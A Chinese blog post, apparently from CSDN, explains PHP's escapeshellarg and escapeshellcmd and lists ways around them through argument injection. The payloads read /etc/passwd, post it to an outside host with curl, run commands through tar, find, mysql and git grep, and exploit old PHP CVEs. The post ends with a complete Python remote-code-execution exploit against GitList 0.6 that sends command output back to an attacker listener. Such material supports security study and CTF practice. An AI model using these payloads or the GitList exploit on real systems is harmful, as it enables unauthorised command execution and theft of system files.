利用/绕过escapeshellarg/escapeshellcmd函数

最新推荐文章于 2023-12-14 10:28:47 发布
最新推荐文章于 2023-12-14 10:28:47 发布
阅读量5.5k 收藏 21
点赞数 4
分类专栏: 安全学习 文章标签: escapeshellarg escapeshellcmd php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/116902085
版权

利用/绕过escapeshellarg/escapeshellcmd

[1]escapeshellarg和escapeshellcmd的功能

escapeshellarg:
(PHP 4 >= 4.0.3, PHP 5, PHP 7)
把字符串转码为可以在 shell 命令里使用的参数
string escapeshellarg ( string $arg )
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符
概述:
1.确保用户只传递一个参数给命令
2.用户不能指定更多的参数一个
3.用户不能执行不同的命令

escapeshellcmd:
(PHP 4, PHP 5, PHP 7)
shell 元字符转义
string escapeshellcmd ( string $command )
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义;反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$, \x0A 和 \xFF;’ 和 " 仅在不配对儿的时候被转义;在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替
概述:
1.确保用户只执行一个命令
2.用户可以指定不限数量的参数
3.用户不能执行不同的命令

用groups去打印组里每个username成员

<?php
	$username = 'h3rmesk1t';
	system('groups '.$username);
?>

=> 
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare

但是攻击者可以在username里使用;或者||
在Linux里,这意味着第二个命令可以在第一个之后被执行

<?php
	$username = 'h3rmesk1t;id';
	system('groups '.$username);
?>

=> 
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare
uid=0(root) gid=0(root) groups=0(root)

为了防止这一点,我们使用escapeshellcmd
现在攻击者不能允许第2个命令了

<?php
	$username = 'h3rmesk1t;id';
	system(escapeshellcmd('groups '.$username));
?>

=>
groups: ‘h3rmesk1t;id’: no such user

这是因为php内部运行了下列命令,以至于myuser;id被当成了一个字符串

$ groups myuser;id
groups: „myuser;id”: no such user

但是在这种方法中,攻击者可以指定更多参数groups
例如,一次检测多个用户

<?php
	$username = 'h3rmesk1t root';
	system(escapeshellcmd('groups '.$username));
?>

=>
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare
root : root

假设我们希望允许每个脚本执行仅检查一个用户

<?php
	$username = 'h3rmesk1t root';
	system('groups '.escapeshellarg($username));
?>

=> 
groups: ‘h3rmesk1t root’: no such user

这是因为现在$username被视为单个参数:

$ groups 'myuser1 myuser2'
groups: "myuser1 myuser2": no such user

[2]已知的绕过/利用

参数注入

从上一章可以看到,使用escapeshellcmd / escapeshellarg时不可能执行第二个命令
但是我们仍然可以将参数传递给第一个命令
这意味着我们也可以将新选项传递给命令
利用漏洞的能力取决于目标可执行文件
可以在下面找到一些已知可执行文件的列表,其中包含一些可能被滥用的特定选项

TAR

压缩some_file到/tmp/sth

$command = '-cf /tmp/sth /some_file';
system(escapeshellcmd('tar '.$command));

创建一个空文件/tmp/exploit

$command = "--use-compress-program='touch /tmp/exploit' -cf /tmp/passwd /etc/passwd";
system(escapeshellcmd('tar '.$command));

FIND

在/Desktop目录下查找1.php

<?php
	$command = '1.php';
	system('find ~/Desktop/ -iname '.escapeshellcmd($command));
?>

=> 
/root/Desktop/1.php

打印/etc/passwd内容

<?php
	$file = "sth -or -exec cat /etc/passwd ; -quit";
	system("find /tmp -iname ".escapeshellcmd($file));
?>

=>
root:x:0:0:root:/root:/bin/bash
......

Escapeshellcmd和escapeshellarg

在这个配置中,我们可以传递第二个参数给函数。
列出/tmp目录并忽略sth文件

<?php
	$arg = "sth";
	system(escapeshellcmd("ls --ignore=".escapeshellarg($arg).' /tmp'));
?>

在/tmp目录中列出文件并忽略sth;使用长列表格式

$arg = "sth' -l ";
// ls --ignore='exploit'\'' -l ' /tmp
system(escapeshellcmd("ls --ignore=".escapeshellarg($arg).' /tmp'));

WGET,下载example.php

$url = 'http://example.com/example.php';
system(escapeshellcmd('wget '.$url));

保存.php文件到指定目录

$url = '--directory-prefix=/var/www/html http://example.com/example.php';
system(escapeshellcmd('wget '.$url));

用.bat执行命令

打印somedir中的文件列表

$dir = "somedir";
file_put_contents('out.bat', escapeshellcmd('dir '.$dir));
system('out.bat');

并且执行whoami命令

$dir = "somedir x1a whoami";
file_put_contents('out.bat', escapeshellcmd('dir '.$dir));
system('out.bat');

SENDMAIL

发送mail.txt到from@sth.com

$from = 'from@sth.com';
system("/usr/sbin/sendmail -t -i -f".escapeshellcmd($from ).' < mail.txt');

打印/etc/passwd内容

$from = 'from@sth.com -C/etc/passwd -X/tmp/output.txt';
system("/usr/sbin/sendmail -t -i -f".escapeshellcmd($from ).' < mail.txt');

CURL

下载http://example.com内容

$url = 'http://example.com';
system(escapeshellcmd('curl '.$url));

发送/etc/passwd内容到http://example.com

$url = '-F password=@/etc/passwd http://example.com';
system(escapeshellcmd('curl '.$url));

你可以得到文件内容,使用如下payload

file_put_contents('passwords.txt', file_get_contents($_FILES['password']['tmp_name']));

MYSQL

执行sql语句

$sql = 'SELECT sth FROM table';
system("mysql -uuser -ppassword -e ".escapeshellarg($sql));

运行id命令

$sql = '! id';
system("mysql -uuser -ppassword -e ".escapeshellarg($sql));

UNZIP

从archive.zip解压所有*.tmp文件到/tmp目录

$zip_name = 'archive.zip';
system(escapeshellcmd('unzip -j '.$zip_name.' *.txt -d /aa/1'));

从archive.zip解压所有*.tmp文件到/var/www/html目录

$zip_name = '-d /var/www/html archive.zip';
system('unzip -j '.escapeshellarg($zip_name).' *.tmp -d /tmp');

未设置LANG环境变量,则去除非ASCII字符

$filename = 'résumé.pdf';
// string(10) "'rsum.pdf'"
var_dump(escapeshellarg($filename));
setlocale(LC_CTYPE, 'en_US.utf8');
//string(14) "'résumé.pdf'" 
var_dump(escapeshellarg($filename));

[3]经典EXP

PHP <= 4.3.6 on Windows – CVE-2004-0542

$find = 'word';
system('FIND /C /I '.escapeshellarg($find).' c:\\where\\');

同时运行dir命令

$find = 'word " c:\\where\\ || dir || ';
system('FIND /C /I '.escapeshellarg($find).' c:\where\');

PHP 4 <= 4.4.8 and PHP 5 <= 5.2.5 – CVE-2008-2051

Shell需要使用GBKEUC-KRSJIS等可变宽度字符集的语言环境。

$text = "sth";
system(escapeshellcmd("echo ".$text));
$text = "sth xc0; id";
system(escapeshellcmd("echo ".$text));

或者

$text1 = 'word';
$text2 = 'word2';
system('echo '.escapeshellarg($text1).' '.escapeshellarg($text2));
$text1 = "word xc0";
$text2 = "; id ; #";
system('echo '.escapeshellarg($text1).' '.escapeshellarg($text2));

PHP < 5.4.42, 5.5.x before 5.5.26, 5.6.x before 5.6.10 on Windows – CVE-2015-4642

额外传递的第三个参数(—param3)

$a = 'param1_value';
$b = 'param2_value';
system('my_command --param1 ' . escapeshellarg($a) . ' --param2 ' . escapeshellarg($b));

$a = 'a\';
$b = 'b -c --param3\';
system('my_command --param1 ' . escapeshellarg($a) . ' --param2 ' . escapeshellarg($b));

PHP 7.x before 7.0.2 – CVE-2016-1904

如果将1024mb字符串传递给escapeshellarg,则导致缓冲区溢出escapeshellcmd

PHP 5.4.x < 5.4.43 / 5.5.x < 5.5.27 / 5.6.x < 5.6.11 on Windows

启用EnableDelayedExpansion后,展开一些环境变量。
然后!STH!运行类似于%STH%

escapeshellarg不会过滤!字符
EnableDelayedExpansion以在HKLMHKCU下的注册表中设置:

[HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor]
"DelayedExpansion"= (REG_DWORD)
1=enabled 0=disabled (default)

例如:

// Leak appdata dir value
$text = '!APPDATA!';
print "echo ".escapeshellarg($text);

PHP < 5.6.18

功能定义于ext/standard/exec.c,运行类似于(escapeshellcmd,eschapeshellarg,shell_exec),忽略PHP字符串的长度,并用NULL终止工作代替。

echo escapeshellarg("helloworld");
=>
hello

[4]GitList RCE漏洞利用

文件src/Git/Repository.php

public function searchTree($query, $branch)
{
    if (empty($query)) {
        return null;
    }

    $query = escapeshellarg($query);

    try {
        $results = $this->getClient()->run($this, "grep -i --line-number {$query} $branch");
    } catch (RuntimeException $e) {
        return false;
    }
}

简化后

$query = 'sth';
system('git grep -i --line-number '.escapeshellarg($query).' *');

当我们查看git grep文档时

--open-files-in-pager[=<pager>]
Open the matching files in the pager (not the output of grep). If the pager happens to be "less" or "vi", and the user specified only one pattern, the first file is positioned at the first match automatically.

所以基本上–open-files-in-pager就像是在-exec中执行find.

$query = '--open-files-in-pager=id;';
system('git grep -i --line-number '.escapeshellarg($query).' *');

当我们输入这些进控制台

$ git grep -i --line-number '--open-files-in-pager=id;' *
uid=1000(user) gid=1000(user) grupy=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
id;: 1: id;: README.md: not found

最后的exp

import requests
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urlparse
import urllib
import threading
import time
import os
import re

url = 'http://192.168.1.1/gitlist/'
command = 'id'
your_ip = '192.168.1.100'
your_port = 8001

print "GitList 0.6 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"

print "REMEMBER TO DISABLE FIREWALL"

search_url = None
r = requests.get(url)
repos = re.findall(r'/([^/]+)/master/rss', r.text)

if len(repos) == 0:
    print "[-] No repos"
    os._exit(0)

for repo in repos:
    print "[+] Found repo {}".format(repo)
    r = requests.get("{}{}".format(url, repo))
    files = re.findall(r'href="[^"]+blob/master/([^"]+)"', r.text)
    for file in files:
        r = requests.get("{}{}/raw/master/{}".format(url, repo, file))
        print "[+] Found file {}".format(file)
        print r.text[0:100]
        search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])        
        break

if not search_url:
    print "[-] No files in repo"
    os._exit(0)

print "[+] Search using {}".format(search_url)

class GetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = urlparse.urlparse(self.path)
        print "[+] Command response"
        print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]
        self.send_response(200)
        self.end_headers()
        self.wfile.write("OK")
        os._exit(0)

    def log_message(self, format, *args):
        return

def exploit_server():
    server = HTTPServer((your_ip, your_port), GetHandler)
    server.serve_forever()

print "[+] Start server on {}:{}".format(your_ip, your_port)
t = threading.Thread(target=exploit_server)
t.daemon = True
t.start()
print "[+] Server started"

r  = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\"http://{}:{}/?a=\".urlencode(shell_exec(\"{}\")));"'.format(your_ip, your_port, command)})

while True:
    time.sleep(1)

参考链接

H3rmesk1t
关注
专栏目录
BUUCTF 2018 Online Tool(escapeshellargescapeshellcmd
weixin_45577185的博客
07-24 172
答案博客 参考博客 百度来了一篇文章: https://paper.seebug.org/164/ 这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。 escapeshellargescapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。 escapeshellcmd: e
php escapeshellcmd,利用/绕过 PHP escapeshellarg/escapeshellcmd函数
weixin_42138703的博客
03-11 2546
escapeshellargescapeshellcmd的功能escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的命令让我们用groups去打印组里每个username成员$username = 'myuser';system(...
PHP escapeshellarg()+escapeshellcmd()绕过
rev1ve的博客
12-08 2866
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 1343
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2988
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
[红日安全]代码审计Day5 - escapeshellargescapeshellcmd使用不当
hongrisec的博客
03-31 753
点击订阅我们    和红日一起成长 让安全如此精彩   红日安全出品|转载请注明来源 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全) 本文由红日安全成员: l1nk3r...
PHP弱类型及一些绕过姿势
Lemon's blog
04-30 5624
前言: 做web题时经常会遇到各种php弱类型或者是php的一些漏洞函数,由于知识比较零碎,就总结一下我所遇到的,也方便自己以后观看。 0x01:Hash比较缺陷 产生原因: PHP在处理哈希字符串时,通过!=或==来对哈希值进行比较,它把每一个以0e开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以0e开头的,那么PHP将会认为他们相同,都是0 具体实例: 审计代码,我...
【复习】[网鼎杯 2020 朱雀组]phpweb --- 命名空间绕过黑名单
Zero_Adam的博客
05-16 508
目录:一、自己做:二、学到的,不足:1. 明明空间绕过黑名单三、看WP 两个WP https://www.anquanke.com/post/id/205679 https://www.freesion.com/article/6379840490/ 一、自己做: 上来就有报错信息,并且页面不断的刷新。 Warning: date(): It is not safe to rely on the system's timezone settings. You are *required* to use t
【基础篇】第07篇:PHP代码审计笔记--命令执行漏洞1
08-03
这些字符可以被用来构造复合命令,绕过简单的过滤机制。 为了防止命令执行漏洞,文章推荐使用PHP内置的安全函数,如`escapeshellarg()`和`escapeshellcmd()`。前者用于将字符串包裹在单引号中并转义已存在的单引号...
php危险函数文章总结(一)
qq975353472的博客
11-14 218
php危险函数文章总结(一) 因为被分配的任务是总结文章,所以就对一篇文章深深的研究了一下,以下基本都是对该下的文章的总结。 原文在这里 in_array() in_array :(PHP 4, PHP 5, PHP 7) 功能 :检查数组中是否存在某个值 定义 : bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 T
escapeshellarg绕过与参数注入漏洞
Galaxy_0的博客
02-15 291
escapeshellarg绕过与参数注入漏洞
escapeshellarg参数绕过和注入的问题
最新发布
m0_75178803的博客
12-14 1556
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
php escapeshellcmd
刘阳龙Herman的专栏
09-14 1751
<br />除去字符串中的特殊符号。 <br />语法:string escapeshellcmd(string command);<br />返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br /> 内容说明<br />本函数除去了字符串中的特殊符号,可以防止使用者耍花招来破解该服务器系统。可以用本函数搭配 exec() 或是 system() 二个函数,酱子可以减少网络上的使用者恶意的破晃募机会。 <br /> <br /> 使用范例<br /><?php<br />sys
escapeshellarg escapeshellcmd漏洞
a3320315的博客
01-31 1402
[BUUCTF 2018]Online [BUUCTF 2018]Online 谈escapeshellarg绕过与参数注入漏洞 命令参数注入
php escapeshellcmd,PHP escapeshellarg()+escapeshellcmd() 之殇
weixin_36368404的博客
03-11 375
Author: Hcamael, p0wd3r (知道创宇404安全实验室)Date: 2016-12-280x00 简介前两天爆出了 PHPMailer 小于 5.2.18 版本的 RCE 漏洞,官方在补丁中使用了escapeshellarg来防止注入参数,但有趣的是经过测试我们发现该补丁是可以被绕过的,并且攻击面可以延伸到更大而不仅仅是局限于这个应用。0x01 漏洞复现环境搭建Dockerfi...
php escapeshellcmd,从escapeshellcmd bypass说起到宽字节注入
weixin_42500195的博客
03-11 535
1 php 多字节绕过escapeshellcmdescapeshellcmd()对shell元字符过滤加反斜杠;反斜线(\)会在以下字符之前插入: #&;`|*?~<>^()[]{}$, \x0A 和 \xFF,但在php5.2.5及之前存在通过输入多字节绕过escapeshellcmd的问题。5.2.6 已经修复了该问题。执行 escapeshellcmd("echo "....
浅谈CTF中escapeshellarg利用
读万卷书,行万里路。
08-09 5552
浅谈 escapeshellarg利用 文章目录浅谈 escapeshellarg利用0 前言1 参数注入2 逃逸字符2.1 cat flag2.2 freepoint3 总结 0 前言 escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellargescapeshellcmd 相似,主要看是否有引号) 在 CTF 可能被用于: 参数注入(开发人员错误的使用 escapeshellarg 函数) 逃逸字符(该函数非二进制安全) 1
escapeshellarg
03-16
escapeshellarg是一个PHP函数,用于将字符串转义为安全shell参数。它可以确保字符串中的特殊字符不会被shell解释为命令或选项。这个函数通常用于构建shell命令行参数,以避免命令注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值